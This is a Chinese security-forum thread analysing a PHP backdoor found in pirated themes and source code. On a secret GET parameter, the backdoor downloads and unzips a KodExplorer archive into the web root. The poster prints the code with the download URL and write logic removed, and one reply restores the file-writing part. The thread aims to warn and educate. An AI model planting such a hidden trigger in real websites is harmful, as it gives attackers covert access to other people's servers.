吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 47418|回复: 233
收起左侧

[分享] 分析一段PHP的后门代码,很恶心

    [复制链接]
xiaoma9624 发表于 2019-5-22 18:25
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 xiaoma9624 于 2019-5-24 13:05 编辑

给大家分析一个简单的可以自己发现的PHP后门代码,这段代码存在与好多破解主题与源码中,我自己就至少发现了四五种。包括本站有人分享的源码中,也有这种代码。具体自己看下吧!
由于上次发帖子违规,现在需要爱心值消除违规,在看完我的分析之后能不能给个热心呢?谢谢大家了。这个帖子应该没有违规吧!如有违规请告知。谢谢!
我再重申一遍,代码做了修改,为了防小人,大家知道代码原理就行了,非要自己弄到完整的要放到自己源码里坑人?还有这个代码不是可道云里面的。官方的可道云没有问题,没看明白的就再看一遍。不知道哪位热心的网友把帖子转到了QQ安全管家的论坛了,安全管家的工作人员已经和我要走了原始样本分析了,如果还有什么新的情况会在这里说明。


我分享代码是为了叫大家了解他的工作原理,提高警惕的。修改代码是不希望有的人直接拿去放到自己源码里面。因为有这种人,所以我修改了源码。所以不要再纠结这段代码能不能运行了!好不好!也希望大家有能力补全的自己留着就好,别发出来。
还是那句话,防小人,防小人,防小人


正文开始


先上代码
[PHP] 纯文本查看 复制代码
if($_GET['ac']=="ok"){        echo 'OK';
    function downFile($url,$path){
        $arr=parse_url($url);
        $fileName=basename($arr['path']);
        $file=file_get_contents($url);
    }
    downFile("这里是网络下载地址,防止小人,直接删除这里的连接");
    
    class Unzip{
        public function __construct(){
            header("content-type:text/html;charset=utf8");
        }
        public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){
            if ($zip = zip_open($src_file)){
                if ($zip){
                    $splitter = ($create_zip_name_dir === true) ? "." : "/";
                    if($dest_dir === false){
                      
                    }
                    $this->create_dirs($dest_dir);
                    while ($zip_entry = zip_read($zip)){
                        $pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");
                        if ($pos_last_slash !== false){
                            $this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));
                        }
                        if (zip_entry_open($zip,$zip_entry,"r")){
                            $file_name = $dest_dir.zip_entry_name($zip_entry);
                                if ($overwrite === true || $overwrite === false && !is_file($file_name)){
                                    $fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                                    
                                    
                                }
                            zip_entry_close($zip_entry);
                        }
                    }
                    zip_close($zip);
                }
            }else{
                return false;
            }
            return true;
        }
        public function create_dirs($path){
            if (!is_dir($path)){
                $directory_path = "";
                $directories = explode("/",$path);
                array_pop($directories);
                foreach($directories as $directory){
                    $directory_path .= $directory."/";
                    if (!is_dir($directory_path)){
                        mkdir($directory_path);
                        chmod($directory_path, 0777);
                    }
                }
            }
        }
    }
    $z = new Unzip();
    $z->unzip("kodexplorer4.39.zip",'./', true, false);
}



            以上代码是我发现的后门里面最简单的也是最贱的一个代码,当收到GET请求ac=ok时。会自动的下载kodexplorer4.39.zip,对你没看错,就是这货可道云。知道可道云的自然是知道这个代码是怎么工作的了。不知道的我给大家简单的解释一下吧,可道云是一个私有云系统,运行在虚拟主机和服务器下。当下载解压完之后这货就成了你的服务器后门。别人可以通过可道云查看你的服务器内容。可以下载你服务器的文件,并且连接数据库修改数据。


            是不是很简答?是不是很恶心?你杀毒都查不出这些东西!所以大家使用盗版的时候注意自己看下,中了招你都不知道怎么中的还以为是SQL注入修改的数据库。下面上图大家自己看一下吧。本地搭建的服务器写的代码测试的。大家有兴趣可以自己试试。


如果对你有用给个爱心啊,我要消除违规。还有奉劝那些知道后想做坏事的人啊,别干这么缺德的事。
由于怕有人拿走恶心人,代码修改了一部分,去掉了一些代码。想拿走给自己源码加后门的劝你们要点脸啊。

登陆页面

登陆页面

自动下载

自动下载

目录

目录

免费评分

参与人数 175吾爱币 +116 热心值 +165 收起 理由
z18669911973 + 1 我很赞同!
傻猪猪123 + 1 谢谢@Thanks!
Ashes_CF + 1 热心回复!
jemmshy + 1 我很赞同!
xie196 + 1 + 1 热心回复!
zrq2259 + 1 + 1 我很赞同!
Lsxjng + 1 我很赞同!
Lee吃胖 + 1 + 1 我很赞同!
ebzoyf + 1 + 1 我很赞同!
霏映 + 1 + 1 我很赞同!
Naran + 1 学习了,感谢分享!
幻影异呈 + 1 + 1 谢谢@Thanks!
a农村老牛 + 1 + 1 我很赞同!
baisuige + 1 用心讨论,共获提升!
kevin_2019 + 1 + 1 我很赞同!
zh14960413 + 1 用心讨论,共获提升!
小小学生 + 1 + 1 我很赞同!
星空迷徒 + 1 热心回复!
道极承天 + 1 热心回复!
xielyhaoli + 1 + 1 用心讨论,共获提升!
xinlingduyu + 1 鼓励转贴优秀软件安全工具和文档!
sxb180388831 + 1 + 1 热心回复!
极真武魂 + 1 热心回复!
贾贵 + 1 我很赞同!
客先生 + 1 热心回复!
liuss2010 + 1 + 1 热心回复!
纯色遐想 + 1 热心回复!
Lecoeur + 1 + 1 我很赞同!
Boxkun + 1 + 1 谢谢@Thanks!
Woodrow + 1 用心讨论,共获提升!
Fuung + 1 + 1 用心讨论,共获提升!
0mogul0 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
夜弦风 + 1 + 1 谢谢@Thanks!
xiaoke1230 + 1 我很赞同!
zx1364256 + 1 + 1 谢谢@Thanks!
淑茞豳 + 1 + 1 我很赞同!
jjhan123453 + 1 + 1 热心回复!
tuipo + 1 谢谢@Thanks!
宙斯 + 1 我很赞同!
4630269wu + 1 + 1 用心讨论,共获提升!
245615486 + 1 + 1 热心回复!
狄人3 + 1 + 1 热心回复!
赤盟 + 1 热心回复!
卡麦苏醒 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wuyanchengxi + 1 + 1 谢谢@Thanks!
123456789QWERTY + 1 鼓励转贴优秀软件安全工具和文档!
zq3800cc + 1 + 1 热心回复!
52_steven + 1 + 1 鼓励转贴优秀软件安全工具和文档!
aceryao + 1 + 1 我很赞同!
wzq + 1 热心回复!
5omggx + 1 用心讨论,共获提升!
limu1433223 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
zhinian1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
泠月酱 + 1 + 1 我很赞同!
iYoloPPD + 1 zanzanzan
yahu5 + 1 + 1 热心回复!
帝巴必 + 1 + 1 感谢给我提供了思路
dxhack + 1 + 1 谢谢@Thanks!
houhd + 1 热心回复!
玖之一 + 1 + 1 我很赞同!
瞎子 + 1 + 1 用心讨论,共获提升!
写代码的猴子 + 1 热心回复!
13236568780 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
3.1415 + 1 热心回复!
key9928 + 1 用心讨论,共获提升!
wawqwqq + 1 downFile()的url和path参数并未定义,只是get=a无法实现,
xjkonglong + 1 + 1 我很赞同!
仅有沉默 + 1 + 1 用心讨论,共获提升!
nofailyoung + 1 + 1 学习学习。
洛奇亚瑟 + 1 谢谢@Thanks!
fhyz + 1 + 1 谢谢@Thanks!
压力山大 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
cz226 + 1 + 1 谢谢@Thanks!
lplp01110 + 1 + 1 希望能看看wp发的主题有木有这个漏洞
freedev100 + 1 + 1 用心讨论,共获提升!
wscx + 1 + 1 用心讨论,共获提升!
yinzhiyi + 1 鼓励转贴优秀软件安全工具和文档!
stanw + 1 + 1 谢谢@Thanks!
逍遥客7 + 1 + 1 谢谢@Thanks!
观音大湿_enjoy + 1 + 1 用心讨论,共获提升!
dongzu + 1 + 1 热心回复!
安兴君 + 1 + 1 谢谢@Thanks!
Stone.zl + 1 谢谢@Thanks!
s37999 + 1 我很赞同!
bakaest + 1 + 1 防小人
Barnes + 1 + 1 谢谢@Thanks!
zhangyuepeng869 + 1 + 1 我很赞同!
FleTime + 1 热心回复!
x34178148 + 1 我很赞同!
Thending + 1 盗版才有的吧
baltsftyj + 1 + 1 热心回复!
mengsiyiren + 1 + 1 我很赞同!
汐渚之月 + 1 + 1 虽然用不到,而且感谢你的分享精神,防小人
qwe124040 + 1 + 1 我很赞同!
1062807258wang + 1 + 1 我很赞同!
AshCrimson + 1 + 1 鼓励转贴优秀软件安全工具和文档!
千域 + 1 热心回复!
kown + 1 + 1 用心讨论,共获提升!
Xie943 + 1 用心讨论,共获提升!
糖醋排骨盖饭 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

rickw 发表于 2019-5-22 21:35
xiaoma9624 发表于 2019-5-22 21:22
没啥?你要自己验证代码么?

论坛里面是进行技术交流的。

贴了代码,也贴了分析说明。
代码贴和分析结论不一致,还没有任何说明,容易给其他学习者造成误导。
如果是隐藏了代码,在隐藏点写上备注说明,这样别人也不会被错误误导了。

为了便于大家交流讨论,我来尝试还原一下代码
[PHP] 纯文本查看 复制代码
 

function downFile($url,$path){
        $arr=parse_url($url);
        //这个地方是和url相关的,如果url不一样这个地方文件名获取的方式也不同
        $fileName=basename($arr['path']);
        $file=file_get_contents($url);
        //数据写入文件
        $fh = fopen($path . $fileName, 'wb');
         fwrite($fh, $file);
        fclose($fh);
    }
    downFile("这里是网络下载地址", "./" );

免费评分

参与人数 3吾爱币 +3 热心值 +2 收起 理由
PearlyNautilus + 1 + 1 就喜欢你这种实在人!!
sir66888 + 1 + 1 就是喜欢你这种实在人
罗婷 + 1 其实服务器权限下这个不算后门,可道云不能跨站

查看全部评分

keymind 发表于 2019-5-22 18:51
本站分享的哪些源码有这种后门?能透露一下让大家引起注意吗?
zhiyixs 发表于 2019-5-22 18:36
apian 发表于 2019-5-22 18:38
真的很恶心的后门
 楼主| xiaoma9624 发表于 2019-5-22 18:39
看完的能不能给个热心值呢?热心值免费的!谢谢大家了
foxdog 发表于 2019-5-22 18:39
举报了吗?。
包括本站有人分享的源码中,也有这种代码。
 楼主| xiaoma9624 发表于 2019-5-22 18:40

连接失效了就没管!
foxdog 发表于 2019-5-22 18:47
xiaoma9624 发表于 2019-5-22 18:40
连接失效了就没管!

建议你说清楚,要不然感觉怪怪的
 楼主| xiaoma9624 发表于 2019-5-22 18:50
foxdog 发表于 2019-5-22 18:47
建议你说清楚,要不然感觉怪怪的

啥说清楚?代码都在上面呢还咋说清楚啊!
yc19951005 发表于 2019-5-22 18:53
感谢楼主分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 20:39

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表